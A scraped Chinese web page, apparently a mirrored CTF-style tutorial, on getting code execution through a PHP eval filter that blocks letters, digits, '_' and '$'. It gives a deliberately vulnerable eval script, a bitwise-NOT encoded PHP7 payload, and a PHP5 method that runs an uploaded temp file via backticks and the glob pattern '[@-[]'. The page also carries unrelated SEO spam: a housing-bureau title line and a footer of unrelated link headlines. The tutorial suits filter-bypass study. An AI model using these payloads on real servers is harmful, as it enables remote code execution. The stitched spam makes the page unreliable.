当前位置: 首页 > news >正文

阳泉住房建设局网站树立网站整体风格

阳泉住房建设局网站,树立网站整体风格,百度平台电话多少,百度关键词搜索排行目录 引言 如果是在php7 如果是在php5 现在我们来上传文件 最后的结果#xff1a; 看本篇前可以先看这一篇#xff1a;利用异或、取反、自增bypass_webshell_waf-CSDN博客 引言 上一篇介绍了如何构造出一个无字母数字的webshell#xff0c;但是如果后端的代码变成了这…目录 引言 如果是在php7 如果是在php5 现在我们来上传文件 最后的结果 看本篇前可以先看这一篇利用异或、取反、自增bypass_webshell_waf-CSDN博客 引言 上一篇介绍了如何构造出一个无字母数字的webshell但是如果后端的代码变成了这样 ?php if(isset($_GET[code])){$code $_GET[code];if(strlen($code)35){die(Long.);}if(preg_match(/[A-Za-z0-9_$]/,$code)){die(NO.);}eval($code); }else{highlight_file(__FILE__); } 这里过滤了大小写字母、数字、_、$因此我们上一篇介绍的利用$和_的方式都无法实现了那么应该怎么构造webshell呢 如果是在php7 php7中这个问题并不是很难解决PHP7前是不允许用($a)();这样的方法来执行动态函数的但PHP7中增加了对此的支持。 所以我们可以通过(phpinfo)();来执行函数第一个括号中可以是任意PHP表达式。 所以很简单了构造一个可以生成phpinfo这个字符串的PHP表达式即可。 因为有大小写字母的限制我们首先需要将phpinfo这个字符串转换为URL编码 ?php $a phpinfo; echo urlencode(~$a); 那么就可以构造一个如此的payload了 (~%8F%97%8F%96%91%99%90)(); 如果是在php5 此时如果我们尝试用PHP7的payload将会得到一个错误 原因就是php5并不支持这种表达方式。 那么这个问题现在呢应该怎么解决呢 操作系统里包含的最重要的两个功能就是“shell系统命令”和“文件系统”很多木马与远控其实也只实现了这两个功能。 PHP自然也能够和操作系统进行交互“反引号”就是PHP中最简单的执行shell的方法。 那么在使用PHP无法解决问题的情况下为何不考虑用“反引号”“shell”的方式来getshell呢 因为反引号不属于“字母”、“数字”所以我们可以执行系统命令但问题来了如何利用无字母、数字、$的系统命令来getshell 好像问题又回到了原点无字母、数字、$在shell中仍然是一个难题。 此时还有两个有趣的Linux shell知识点需要理解 1、shell下可以利用. 来执行任意脚本 它的作用和source一样就是用当前的shell执行一个文件中的命令。 比如当前运行的shell是bash则. file的意思就是用bash执行file文件中的命令。 可以尝试编辑这样一个文件 vim id.txt  echo id然后使用.来执行一下 . id.txt id可以看到确实是执行了 用. file执行文件是不需要file有x权限的。 那么如果目标服务器上有一个我们可控的文件那不就可以利用.来执行它了吗 这个文件也很好得到我们可以发送一个上传文件的POST包此时PHP会将我们上传的文件保存在临时文件夹下默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母。 2、Linux文件名支持用glob通配符代替 执行. /tmp/phpXXXXXX也是有字母的。此时就可以用到Linux下的glob通配符 *可以代替0个及以上任意字符 ?可以代表1个任意字符 那么/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。 但我们尝试执行. /???/?????????却得到如下错误 这是因为能够匹配上/???/?????????这个通配符的文件有很多我们可以列出来 先不看有这么多的文件就在执行第一个匹配上的文件即/bin/abrt-cli的时候就已经出现了错误导致整个流程停止根本不会执行到我们上传的文件。 就跟正则表达式类似glob支持利用[0-9]来表示一个范围。 我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写只有PHP生成的临时文件包含大写字母。 那么答案就呼之欲出了我们只要找到一个可以表示“大写字母”的glob通配符就能精准找到我们要执行的文件。 翻开ascii码表可见大写字母位于与[之间 那么我们可以利用[-[]来表示大写字母 . /???/????????[-[] 现在我们来上传文件 web.html !DOCTYPE html html langenheadmeta charsetUTF-8meta http-equivX-UA-Compatible contentIEedgemeta nameviewport contentwidthdevice-width, initial-scale1.0titleDocument/title /headbodyform actionweb1.php methodpost enctypemultipart/form-datainput typefile nameupload_file idinput typesubmit valuesubmit/form /body/htmlweb.php ?php if(isset($_GET[code])){$code $_GET[code];if(strlen($code)35){die(Long.);}if(preg_match(/[A-Za-z0-9_$]/,$code)){die(NO.);}eval($code); }else{highlight_file(__FILE__); }web1.php 这是是用来显示文件的上传信息的 ?php var_dump($_FILES); 注意php生成临时文件名是随机的最后一个字符不一定是大写字母不过多尝试几次也就行了。 首先我们编写一个文件来用作测试 现在我们可以尝试在上传文件后进行抓包 web1.php包 web.php包 然后我们将web1.php包中post的值移动到web.php文件中构造出一个上传文件 还有将Content-Type: multipart/form-data;增加到web.php包中 现在我们就可以在这里使用POST构造出临时文件使用GET匹配临时文件 GE传入的T参数 ??./%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]%3b 最后的结果
http://www.huolong8.cn/news/222182/

相关文章:

  • 成都网站建设学习wordpress没中文插件
  • 网页制作与网站管理设计师的个人网页设计
  • 网站建设ppt百度文库工作祝福语
  • 网站进度表查企业信息的国家网站
  • 湖北专业网站建设商城推广文案
  • 深圳市住房和建设局官方网站查阅鹰潭市城乡建设局老网站
  • 网站源码在哪深圳网域官网
  • 网站域名怎么设置免费申请网站 主机 空间
  • 竞拍网站模板义乌做网站公司哪家好
  • 做网站需要编程?什么网站比较好
  • ai免费模板网站四川建设人才官方网站
  • 网站注册备案之后怎么做网站上传网站图片不显示
  • 纺织网站模板宁波网站开发rswl
  • 网站怎样自己不花钱在电脑上做网页阿里指数官网最新版本
  • 网站建设怎么自学少儿美术专业网站做课件
  • 国家高新技术企业认定官网在线视频网站怎么做seo
  • 单页网站建站网页qq登录页面
  • 服装网站源码php营销型网站建设沈阳
  • 营销型网站建设价值wordpress看板猫
  • 摄影网站制作教程公司测名
  • 国际物流网站一呼百应网做的网站
  • 深圳网站建设clh建设俄语2p2网站
  • 怎么做网站广告代理商移动门户网站建设特点
  • 国内网站是cn还是com建设工作室
  • 南京做网站制作公司国外网站鞋子做的好的网站
  • 万网网站需要的步骤网站建设 18556502558
  • 电商学习网站重庆智能网站建设公司
  • 广州市住房 建设局网站杭州网红
  • 网站建设首先要学会什么网站首页布局seo
  • 成都专门做公司网站的公司苏州吴江保洁公司